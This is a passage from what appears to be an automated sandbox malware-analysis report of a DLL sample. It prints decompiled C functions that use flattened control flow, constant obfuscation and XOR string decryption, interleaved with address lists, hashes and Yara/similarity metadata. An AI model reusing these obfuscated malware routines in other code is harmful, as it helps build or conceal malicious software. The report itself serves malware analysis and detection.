				_push(_a4);
				_t102 = __ecx;
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t89);
				_v588 = 0xa9001c;
				_t125 =  &(( &_v624)[4]);
				_v588 = _v588 + 0xfffff841;
				_v588 = _v588 ^ 0x00a8f85f;
				_t119 = 0x7750dec;
				_v596 = 0x801276;
				_v596 = _v596 << 8;
				_v596 = _v596 ^ 0x801c5a8c;
				_v592 = 0xe5da65;
				_v592 = _v592 | 0x8d0ca196;
				_v592 = _v592 ^ 0x8de55992;
				_v612 = 0x74ea46;
				_v612 = _v612 >> 6;
				_v612 = _v612 | 0x4c0dce94;
				_v612 = _v612 ^ 0x4c0245c2;
				_v604 = 0x7f8ae0;
				_t104 = 0x6f;
				_v604 = _v604 / _t104;
				_v604 = _v604 + 0x431c;
				_v604 = _v604 ^ 0x0002d2ab;
				_v608 = 0x66ed0;
				_v608 = _v608 >> 5;
				_v608 = _v608 * 0x5a;
				_v608 = _v608 ^ 0x001395e3;
				_v620 = 0x99715e;
				_v620 = _v620 + 0xffff5a71;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0xbf19;
				_v620 = _v620 ^ 0xcbc1aabc;
				_v624 = 0x2a4f9d;
				_v624 = _v624 | 0x7ed7085f;
				_v624 = _v624 + 0xffff4297;
				_v624 = _v624 | 0x5a00af06;
				_v624 = _v624 ^ 0x7efc78c9;
				_v600 = 0xb3c9ce;
				_v600 = _v600 + 0xffff4f2d;
				_v600 = _v600 ^ 0x00b0dce6;
				_t118 = _v600;
				_v616 = 0x17dc9d;
				_v616 = _v616 ^ 0xb350768a;
				_v616 = _v616 + 0xffff5841;
				_v616 = _v616 ^ 0xb3483330;
				do {
					while(_t119 != 0x26f316f) {
						if(_t119 == 0x4832572) {
							_v556 = 0x22c;
							_t105 =  &_v556;
							_t97 = E02AEBD23(_t105, _t118, _v612, _v604, _v608);
							_t125 =  &(_t125[3]);
							L12:
							asm("sbb esi, esi");
							_t119 = ( ~_t97 & 0xf2b580e0) + 0xfb9b08f;
							continue;
						}
						if(_t119 == 0x7750dec) {
							_v564 = _t102;
							_t119 = 0xecc24d5;
							continue;
						}
						if(_t119 == 0x88070fd) {
							_t97 = E02B006EC(_v620, _t118, _v624,  &_v556);
							_pop(_t105);
							goto L12;
						}
						if(_t119 != 0xecc24d5) {
							if(_t119 == 0xfb9b08f) {
								return E02B01538(_v600, _v616, _t118);
							}
							goto L18;
						}
						_push(_t105);
						_t97 = E02AE7603(_v588);
						_t118 = _t97;
						_t105 = _t105;
						__eflags = _t97 - 0xffffffff;
						if(__eflags != 0) {
							_t119 = 0x4832572;
							continue;
						}
						L8:
						return _t97;
					}
					__eflags = E02AEE5C0(__eflags,  &_v556,  &_v584);
					if(__eflags == 0) {
						_t119 = 0xfb9b08f;
						goto L18;
					} else {
						_t119 = 0x88070fd;
						continue;
					}
					goto L8;
					L18:
					__eflags = _t119 - 0x5c72449;
				} while (__eflags != 0);
				return _t97;
			}























                                                                                                          0x02ae1f42
                                                                                                          0x02ae1f47
                                                                                                          0x02ae1f4e
                                                                                                          0x02ae1f50
                                                                                                          0x02ae1f51
                                                                                                          0x02ae1f52
                                                                                                          0x02ae1f57
                                                                                                          0x02ae1f5f
                                                                                                          0x02ae1f62
                                                                                                          0x02ae1f6c
                                                                                                          0x02ae1f74
                                                                                                          0x02ae1f79
                                                                                                          0x02ae1f86
                                                                                                          0x02ae1f8b
                                                                                                          0x02ae1f93
                                                                                                          0x02ae1f9b
                                                                                                          0x02ae1fa3
                                                                                                          0x02ae1fab
                                                                                                          0x02ae1fb3
                                                                                                          0x02ae1fb8
                                                                                                          0x02ae1fc0
                                                                                                          0x02ae1fc8
                                                                                                          0x02ae1fd6
                                                                                                          0x02ae1fd9
                                                                                                          0x02ae1fdd
                                                                                                          0x02ae1fe5
                                                                                                          0x02ae1fed
                                                                                                          0x02ae1ff5
                                                                                                          0x02ae1fff
                                                                                                          0x02ae2003
                                                                                                          0x02ae200b
                                                                                                          0x02ae2013
                                                                                                          0x02ae201b
                                                                                                          0x02ae2020
                                                                                                          0x02ae2028
                                                                                                          0x02ae2030
                                                                                                          0x02ae2038
                                                                                                          0x02ae2040
                                                                                                          0x02ae2048
                                                                                                          0x02ae2050
                                                                                                          0x02ae2058
                                                                                                          0x02ae2060
                                                                                                          0x02ae2068
                                                                                                          0x02ae2070
                                                                                                          0x02ae2074
                                                                                                          0x02ae207c
                                                                                                          0x02ae2084
                                                                                                          0x02ae208c
                                                                                                          0x02ae2094
                                                                                                          0x02ae2094
                                                                                                          0x02ae20a6
                                                                                                          0x02ae2146
                                                                                                          0x02ae2152
                                                                                                          0x02ae215a
                                                                                                          0x02ae215f
                                                                                                          0x02ae211f
                                                                                                          0x02ae2123
                                                                                                          0x02ae212b
                                                                                                          0x00000000
                                                                                                          0x02ae212b
                                                                                                          0x02ae20b2
                                                                                                          0x02ae2132
                                                                                                          0x02ae2136
                                                                                                          0x00000000
                                                                                                          0x02ae2136
                                                                                                          0x02ae20ba
                                                                                                          0x02ae2118
                                                                                                          0x02ae211e
                                                                                                          0x00000000
                                                                                                          0x02ae211e
                                                                                                          0x02ae20c2
                                                                                                          0x02ae20c6
                                                                                                          0x00000000
                                                                                                          0x02ae20da
                                                                                                          0x00000000
                                                                                                          0x02ae20c6
                                                                                                          0x02ae20ee
                                                                                                          0x02ae20f4
                                                                                                          0x02ae20f9
                                                                                                          0x02ae20fc
                                                                                                          0x02ae20fd
                                                                                                          0x02ae2100
                                                                                                          0x02ae2102
                                                                                                          0x00000000
                                                                                                          0x02ae2102
                                                                                                          0x02ae20e5
                                                                                                          0x02ae20e5
                                                                                                          0x02ae20e5
                                                                                                          0x02ae2173
                                                                                                          0x02ae2175
                                                                                                          0x02ae2181
                                                                                                          0x00000000
                                                                                                          0x02ae2177
                                                                                                          0x02ae2177
                                                                                                          0x00000000
                                                                                                          0x02ae2177
                                                                                                          0x00000000
                                                                                                          0x02ae2183
                                                                                                          0x02ae2183
                                                                                                          0x02ae2183
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Ft
                                                                                                          • API String ID: 0-1468847975
                                                                                                          • Opcode ID: d9398aa2f83e41623597578be418edf376b806272adefadad636324a5eec6a46
                                                                                                          • Instruction ID: 8a49dd6406deffdefa68e49ac70c54696702b8612d00a9f7d2108ad9ee90ceaa
                                                                                                          • Opcode Fuzzy Hash: d9398aa2f83e41623597578be418edf376b806272adefadad636324a5eec6a46
                                                                                                          • Instruction Fuzzy Hash: AE518E728083418BC758DF24D88551FBBE5FBC4728F044A1DF99AA2160DBB1CA4ACF87
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFE1F8, Relevance: 1.4, Strings: 1, Instructions: 112COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 90%
                                                                                                          			E02AFE1F8(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t64;
				signed int _t73;
				short* _t92;
				signed int _t93;
				signed int _t99;
				unsigned int _t100;
				unsigned int _t101;
				signed int _t110;
				short* _t111;
				signed int* _t112;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				unsigned int _t118;
				void* _t124;
				short _t126;
				void* _t128;
				void* _t130;

				_push( *(_t128 + 0x30));
				_push( *(_t128 + 0x30));
				_push( *(_t128 + 0x30));
				_push(__ecx);
				E02AFFE29(_t64);
				 *(_t128 + 0x28) = 0xaa6cff;
				_t112 =  &(__ecx[1]);
				 *(_t128 + 0x28) =  *(_t128 + 0x28) + 0x5a3e;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) << 0xc;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0xac7afad8;
				 *(_t128 + 0x24) = 0xf23620;
				_t114 = 0x4f;
				 *(_t128 + 0x28) =  *(_t128 + 0x24) / _t114;
				_t115 = 0x1d;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) / _t115;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0x0000f47a;
				 *(_t128 + 0x24) = 0x6765f0;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) | 0x7b5bc89c;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) >> 1;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) ^ 0x3db51d28;
				 *(_t128 + 0x30) = 0xe89ec2;
				_t116 = 0x26;
				 *(_t128 + 0x2c) =  *(_t128 + 0x30) / _t116;
				 *(_t128 + 0x2c) =  *(_t128 + 0x2c) ^ 0x00078a4c;
				_t110 =  *__ecx;
				_t113 =  &(_t112[1]);
				_t73 =  *_t112 ^ _t110;
				 *(_t128 + 0x30) = _t110;
				 *(_t128 + 0x34) = _t73;
				_t118 =  !=  ? (_t73 + 0x00000001 & 0xfffffffc) + 4 : _t73 + 1;
				_t92 = E02AEC5D8(_t118 + _t118);
				_t130 = _t128 + 0x18;
				 *((intOrPtr*)(_t130 + 0x18)) = _t92;
				if(_t92 != 0) {
					_t126 = 0;
					_t111 = _t92;
					_t124 =  >  ? 0 :  &(_t113[_t118 >> 2]) - _t113 + 3 >> 2;
					if(_t124 != 0) {
						_t93 =  *(_t130 + 0x20);
						do {
							_t99 =  *_t113;
							_t113 =  &(_t113[1]);
							_t100 = _t99 ^ _t93;
							 *_t111 = _t100 & 0x000000ff;
							_t111 = _t111 + 8;
							 *((short*)(_t111 - 6)) = _t100 >> 0x00000008 & 0x000000ff;
							_t101 = _t100 >> 0x10;
							_t126 = _t126 + 1;
							 *((short*)(_t111 - 4)) = _t101 & 0x000000ff;
							 *((short*)(_t111 - 2)) = _t101 >> 0x00000008 & 0x000000ff;
						} while (_t126 < _t124);
						_t92 =  *((intOrPtr*)(_t130 + 0x1c));
					}
					 *((short*)(_t92 +  *(_t130 + 0x24) * 2)) = 0;
				}
				return _t92;
			}






















                                                                                                          0x02afe1fe
                                                                                                          0x02afe202
                                                                                                          0x02afe206
                                                                                                          0x02afe20b
                                                                                                          0x02afe20c
                                                                                                          0x02afe211
                                                                                                          0x02afe219
                                                                                                          0x02afe21c
                                                                                                          0x02afe226
                                                                                                          0x02afe22b
                                                                                                          0x02afe233
                                                                                                          0x02afe241
                                                                                                          0x02afe246
                                                                                                          0x02afe250
                                                                                                          0x02afe255
                                                                                                          0x02afe25b
                                                                                                          0x02afe263
                                                                                                          0x02afe26b
                                                                                                          0x02afe273
                                                                                                          0x02afe277
                                                                                                          0x02afe27f
                                                                                                          0x02afe28b
                                                                                                          0x02afe28e
                                                                                                          0x02afe292
                                                                                                          0x02afe29a
                                                                                                          0x02afe29e
                                                                                                          0x02afe2a1
                                                                                                          0x02afe2a3
                                                                                                          0x02afe2a7
                                                                                                          0x02afe2bb
                                                                                                          0x02afe2da
                                                                                                          0x02afe2dc
                                                                                                          0x02afe2df
                                                                                                          0x02afe2e5
                                                                                                          0x02afe2ed
                                                                                                          0x02afe2ef
                                                                                                          0x02afe300
                                                                                                          0x02afe305
                                                                                                          0x02afe307
                                                                                                          0x02afe30b
                                                                                                          0x02afe30b
                                                                                                          0x02afe30d
                                                                                                          0x02afe310
                                                                                                          0x02afe315
                                                                                                          0x02afe31d
                                                                                                          0x02afe323
                                                                                                          0x02afe327
                                                                                                          0x02afe330
                                                                                                          0x02afe331
                                                                                                          0x02afe338
                                                                                                          0x02afe33c
                                                                                                          0x02afe340
                                                                                                          0x02afe340
                                                                                                          0x02afe34b
                                                                                                          0x02afe34b
                                                                                                          0x02afe357

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: >Z
                                                                                                          • API String ID: 0-2342695272
                                                                                                          • Opcode ID: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
                                                                                                          • Instruction ID: 28920ae2018b77a8198b87af10b4fa08f855f780850da64433296033bc86f1f9
                                                                                                          • Opcode Fuzzy Hash: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
                                                                                                          • Instruction Fuzzy Hash: F141A1726183119BC314DF29C48485BFBE1FFC8728F494A6EF989A7250D774D905CB86
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE55FF, Relevance: 1.4, Strings: 1, Instructions: 109COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 90%
                                                                                                          			E02AE55FF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t75;
				void* _t84;
				signed int _t88;
				signed int _t89;
				void* _t92;
				intOrPtr _t109;
				signed int* _t112;

				_t108 = _a12;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t75);
				_v68 = 0x7ffd4d;
				_t109 = 0;
				_v64 = 0;
				_t112 =  &(( &_v96)[5]);
				_v80 = 0x808dec;
				_v80 = _v80 << 7;
				_t92 = 0x1c7cd09;
				_t88 = 0x24;
				_v80 = _v80 * 0x7a;
				_v80 = _v80 ^ 0xa1de2a47;
				_v84 = 0x460263;
				_v84 = _v84 + 0xffffc38b;
				_v84 = _v84 + 0xffffb2e6;
				_v84 = _v84 ^ 0x0042c6ce;
				_v88 = 0x2af47a;
				_v88 = _v88 + 0xfffff2b2;
				_v88 = _v88 ^ 0xf3d8a894;
				_v88 = _v88 ^ 0xf3ffbcf7;
				_v92 = 0xf8385b;
				_v92 = _v92 / _t88;
				_v92 = _v92 + 0xffff302a;
				_v92 = _v92 ^ 0x00085c4c;
				_v96 = 0xec2811;
				_t89 = 0x6c;
				_v96 = _v96 / _t89;
				_v96 = _v96 | 0xeb0c0969;
				_v96 = _v96 ^ 0x646fa875;
				_v96 = _v96 ^ 0x8f64cfef;
				_v72 = 0x6e85b8;
				_v72 = _v72 + 0x990a;
				_v72 = _v72 + 0xffff81c6;
				_v72 = _v72 ^ 0x00684c5c;
				_v76 = 0xd1f521;
				_v76 = _v76 | 0xdf7ffbcd;
				_v76 = _v76 ^ 0xdff37ac7;
				do {
					while(_t92 != 0x19e170b) {
						if(_t92 == 0x1c7cd09) {
							_t92 = 0x19e170b;
							continue;
						} else {
							if(_t92 == 0x305f804) {
								_t84 = E02B02BF0(_v88,  &_v60, _v92, _v96, _t108);
								_t112 =  &(_t112[3]);
								__eflags = _t84;
								if(__eflags != 0) {
									_t92 = 0xecd5788;
									continue;
								}
							} else {
								_t117 = _t92 - 0xecd5788;
								if(_t92 != 0xecd5788) {
									goto L11;
								} else {
									E02AF9D3E( &_v60, _v72, _t117, _v76, _t108 + 0x24);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E02AE22A6(_a8, _v80,  &_v60, _v84);
					_t112 =  &(_t112[2]);
					_t92 = 0x305f804;
					L11:
					__eflags = _t92 - 0xfbce5f5;
				} while (__eflags != 0);
				goto L6;
			}




















                                                                                                          0x02ae5606
                                                                                                          0x02ae560a
                                                                                                          0x02ae560b
                                                                                                          0x02ae560f
                                                                                                          0x02ae5613
                                                                                                          0x02ae5614
                                                                                                          0x02ae5615
                                                                                                          0x02ae561a
                                                                                                          0x02ae5622
                                                                                                          0x02ae5624
                                                                                                          0x02ae5628
                                                                                                          0x02ae562b
                                                                                                          0x02ae5635
                                                                                                          0x02ae563a
                                                                                                          0x02ae564b
                                                                                                          0x02ae564e
                                                                                                          0x02ae5652
                                                                                                          0x02ae565a
                                                                                                          0x02ae5662
                                                                                                          0x02ae566a
                                                                                                          0x02ae5672
                                                                                                          0x02ae567a
                                                                                                          0x02ae5682
                                                                                                          0x02ae568a
                                                                                                          0x02ae5692
                                                                                                          0x02ae569a
                                                                                                          0x02ae56aa
                                                                                                          0x02ae56ae
                                                                                                          0x02ae56b6
                                                                                                          0x02ae56be
                                                                                                          0x02ae56ca
                                                                                                          0x02ae56d2
                                                                                                          0x02ae56d6
                                                                                                          0x02ae56de
                                                                                                          0x02ae56e6
                                                                                                          0x02ae56ee
                                                                                                          0x02ae56f6
                                                                                                          0x02ae56fe
                                                                                                          0x02ae5706
                                                                                                          0x02ae570e
                                                                                                          0x02ae5716
                                                                                                          0x02ae571e
                                                                                                          0x02ae5726
                                                                                                          0x02ae5726
                                                                                                          0x02ae5730
                                                                                                          0x02ae5788
                                                                                                          0x00000000
                                                                                                          0x02ae5732
                                                                                                          0x02ae5738
                                                                                                          0x02ae5778
                                                                                                          0x02ae577d
                                                                                                          0x02ae5780
                                                                                                          0x02ae5782
                                                                                                          0x02ae5784
                                                                                                          0x00000000
                                                                                                          0x02ae5784
                                                                                                          0x02ae573a
                                                                                                          0x02ae573a
                                                                                                          0x02ae573c
                                                                                                          0x00000000
                                                                                                          0x02ae573e
                                                                                                          0x02ae574e
                                                                                                          0x02ae575a
                                                                                                          0x02ae575a
                                                                                                          0x02ae573c
                                                                                                          0x02ae5738
                                                                                                          0x02ae575e
                                                                                                          0x02ae5766
                                                                                                          0x02ae5766
                                                                                                          0x02ae579d
                                                                                                          0x02ae57a2
                                                                                                          0x02ae57a5
                                                                                                          0x02ae57aa
                                                                                                          0x02ae57aa
                                                                                                          0x02ae57aa
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: \Lh
                                                                                                          • API String ID: 0-2235754405
                                                                                                          • Opcode ID: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
                                                                                                          • Instruction ID: 273f1d6ba69ac56b23a51f69e871580e2396e763ea283c93c56ec5f104e94906
                                                                                                          • Opcode Fuzzy Hash: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
                                                                                                          • Instruction Fuzzy Hash: E6418871508342CFCB68CF24D88582BBBE5FFD8308F104A1DF59692260EB75CA1ACB46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEE640, Relevance: 1.4, Strings: 1, Instructions: 101COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 91%
                                                                                                          			E02AEE640(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t68;
				void* _t78;
				signed int _t79;
				void* _t82;
				void* _t97;
				signed int* _t100;

				_t96 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t68);
				_v68 = 0x77f17d;
				_t100 =  &(( &_v88)[4]);
				_v68 = _v68 + 0xffffbc47;
				_v68 = _v68 ^ 0x007a21f6;
				_t97 = 0;
				_v76 = 0xd01664;
				_t82 = 0xf37e824;
				_t79 = 0x2a;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0xc6ac;
				_v76 = _v76 ^ 0x63f53bf0;
				_v84 = 0xca0bb3;
				_v84 = _v84 | 0xec4cd5b6;
				_v84 = _v84 ^ 0xa5b6880a;
				_v84 = _v84 + 0x809e;
				_v84 = _v84 ^ 0x497d3a42;
				_v72 = 0x505b1c;
				_v72 = _v72 | 0xf2745011;
				_v72 = _v72 ^ 0xf27af575;
				_v88 = 0x8ba087;
				_v88 = _v88 + 0x570e;
				_v88 = _v88 + 0xffffc480;
				_v88 = _v88 >> 5;
				_v88 = _v88 ^ 0x00062f0c;
				_v64 = 0x507489;
				_v64 = _v64 + 0x50d6;
				_v64 = _v64 ^ 0x0059b1d9;
				_v80 = 0x3c915f;
				_v80 = _v80 + 0xba86;
				_v80 = _v80 / _t79;
				_v80 = _v80 + 0x3cb0;
				_v80 = _v80 ^ 0x00080f7c;
				do {
					while(_t82 != 0x5422f69) {
						if(_t82 == 0xc053a7e) {
							__eflags = E02AF9D3E( &_v60, _v64, __eflags, _v80, _t96 + 4);
							_t97 =  !=  ? 1 : _t97;
						} else {
							if(_t82 == 0xe18d46d) {
								_t78 = E02B02BF0(_v84,  &_v60, _v72, _v88, _t96);
								_t100 =  &(_t100[3]);
								__eflags = _t78;
								if(__eflags != 0) {
									_t82 = 0xc053a7e;
									continue;
								}
							} else {
								if(_t82 != 0xf37e824) {
									goto L9;
								} else {
									_t82 = 0x5422f69;
									continue;
								}
							}
						}
						L12:
						return _t97;
					}
					E02AE22A6(_a4, _v68,  &_v60, _v76);
					_t100 =  &(_t100[2]);
					_t82 = 0xe18d46d;
					L9:
					__eflags = _t82 - 0xc897eb;
				} while (__eflags != 0);
				goto L12;
			}

















                                                                                                          0x02aee647
                                                                                                          0x02aee64b
                                                                                                          0x02aee64c
                                                                                                          0x02aee650
                                                                                                          0x02aee651
                                                                                                          0x02aee652
                                                                                                          0x02aee657
                                                                                                          0x02aee65f
                                                                                                          0x02aee662
                                                                                                          0x02aee66c
                                                                                                          0x02aee674
                                                                                                          0x02aee676
                                                                                                          0x02aee67e
                                                                                                          0x02aee68f
                                                                                                          0x02aee690
                                                                                                          0x02aee694
                                                                                                          0x02aee69c
                                                                                                          0x02aee6a4
                                                                                                          0x02aee6ac
                                                                                                          0x02aee6b4
                                                                                                          0x02aee6bc
                                                                                                          0x02aee6c4
                                                                                                          0x02aee6cc
                                                                                                          0x02aee6d4
                                                                                                          0x02aee6dc
                                                                                                          0x02aee6e4
                                                                                                          0x02aee6ec
                                                                                                          0x02aee6f4
                                                                                                          0x02aee6fc
                                                                                                          0x02aee701
                                                                                                          0x02aee709
                                                                                                          0x02aee711
                                                                                                          0x02aee719
                                                                                                          0x02aee721
                                                                                                          0x02aee729
                                                                                                          0x02aee73c
                                                                                                          0x02aee740
                                                                                                          0x02aee748
                                                                                                          0x02aee750
                                                                                                          0x02aee750
                                                                                                          0x02aee756
                                                                                                          0x02aee7cf
                                                                                                          0x02aee7d1
                                                                                                          0x02aee758
                                                                                                          0x02aee75e
                                                                                                          0x02aee77d
                                                                                                          0x02aee782
                                                                                                          0x02aee785
                                                                                                          0x02aee787
                                                                                                          0x02aee789
                                                                                                          0x00000000
                                                                                                          0x02aee789
                                                                                                          0x02aee760
                                                                                                          0x02aee766
                                                                                                          0x00000000
                                                                                                          0x02aee768
                                                                                                          0x02aee768
                                                                                                          0x00000000
                                                                                                          0x02aee768
                                                                                                          0x02aee766
                                                                                                          0x02aee75e
                                                                                                          0x02aee7d5
                                                                                                          0x02aee7dd
                                                                                                          0x02aee7dd
                                                                                                          0x02aee79e
                                                                                                          0x02aee7a3
                                                                                                          0x02aee7a6
                                                                                                          0x02aee7ab
                                                                                                          0x02aee7ab
                                                                                                          0x02aee7ab
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: B:}I
                                                                                                          • API String ID: 0-2889142627
                                                                                                          • Opcode ID: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
                                                                                                          • Instruction ID: 8df8307518f66f83288fa805590af891cc45c551c92a448f594cffe2d30cfe79
                                                                                                          • Opcode Fuzzy Hash: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
                                                                                                          • Instruction Fuzzy Hash: 8E41BE71508342DBDB58DF60DA8582FBBE5FBC4768F00091DF686921A0DB758A0E8F93
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF0ABA, Relevance: 1.3, Strings: 1, Instructions: 97COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 84%
                                                                                                          			E02AF0ABA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _t98;
				signed int _t104;
				signed int _t105;
				intOrPtr _t116;

				_push(0x104);
				_push(_a16);
				_v44 = 0x104;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(0x104);
				_v56 = 0x2049f9;
				_t116 = 0;
				_v52 = 0;
				_v48 = 0;
				_v20 = 0xeb153a;
				_v20 = _v20 | 0xe521a998;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x000387ae;
				_v32 = 0xc4823f;
				_v32 = _v32 + 0xd346;
				_v32 = _v32 ^ 0x00c87855;
				_v28 = 0x319d41;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x000ba15b;
				_v16 = 0x4743d7;
				_t104 = 0x54;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0xf604c8f9;
				_v16 = _v16 ^ 0xf6068564;
				_v24 = 0x18550b;
				_v24 = _v24 ^ 0x1069247b;
				_t105 = 5;
				_v24 = _v24 / _t105;
				_v24 = _v24 ^ 0x03437d28;
				_v36 = 0xafe78e;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xafe5259b;
				_v8 = 0xc66a38;
				_v8 = _v8 ^ 0x50a68901;
				_v8 = _v8 ^ 0x40045619;
				_v8 = _v8 * 0x15;
				_v8 = _v8 ^ 0x584c57e2;
				_v12 = 0xdb79dc;
				_v12 = _v12 << 0xa;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x1655447b;
				_v12 = _v12 ^ 0x796b06cf;
				_v40 = 0x1393c;
				_v40 = _v40 + 0x9e03;
				_v40 = _v40 ^ 0x000e16cd;
				_t98 = E02AFF790(_t105, _a12, _v20);
				_t115 = _t98;
				if(_t98 != 0) {
					_t116 = E02AEDAAA(_t115, _v24, _v36, _a8, _v8, _t105,  &_v44);
					E02B01538(_v12, _v40, _t115);
				}
				return _t116;
			}




















                                                                                                          0x02af0ac7
                                                                                                          0x02af0ac8
                                                                                                          0x02af0acb
                                                                                                          0x02af0ace
                                                                                                          0x02af0ad1
                                                                                                          0x02af0ad4
                                                                                                          0x02af0ad7
                                                                                                          0x02af0ad8
                                                                                                          0x02af0ad9
                                                                                                          0x02af0ade
                                                                                                          0x02af0ae5
                                                                                                          0x02af0ae7
                                                                                                          0x02af0aec
                                                                                                          0x02af0aef
                                                                                                          0x02af0af6
                                                                                                          0x02af0afd
                                                                                                          0x02af0b01
                                                                                                          0x02af0b08
                                                                                                          0x02af0b0f
                                                                                                          0x02af0b16
                                                                                                          0x02af0b1d
                                                                                                          0x02af0b24
                                                                                                          0x02af0b28
                                                                                                          0x02af0b2f
                                                                                                          0x02af0b3b
                                                                                                          0x02af0b40
                                                                                                          0x02af0b45
                                                                                                          0x02af0b4c
                                                                                                          0x02af0b53
                                                                                                          0x02af0b5a
                                                                                                          0x02af0b64
                                                                                                          0x02af0b6a
                                                                                                          0x02af0b6d
                                                                                                          0x02af0b74
                                                                                                          0x02af0b7b
                                                                                                          0x02af0b7f
                                                                                                          0x02af0b86
                                                                                                          0x02af0b8d
                                                                                                          0x02af0b94
                                                                                                          0x02af0b9f
                                                                                                          0x02af0ba2
                                                                                                          0x02af0ba9
                                                                                                          0x02af0bb0
                                                                                                          0x02af0bb4
                                                                                                          0x02af0bb8
                                                                                                          0x02af0bbf
                                                                                                          0x02af0bc6
                                                                                                          0x02af0bcd
                                                                                                          0x02af0bd4
                                                                                                          0x02af0beb
                                                                                                          0x02af0bf0
                                                                                                          0x02af0bf7
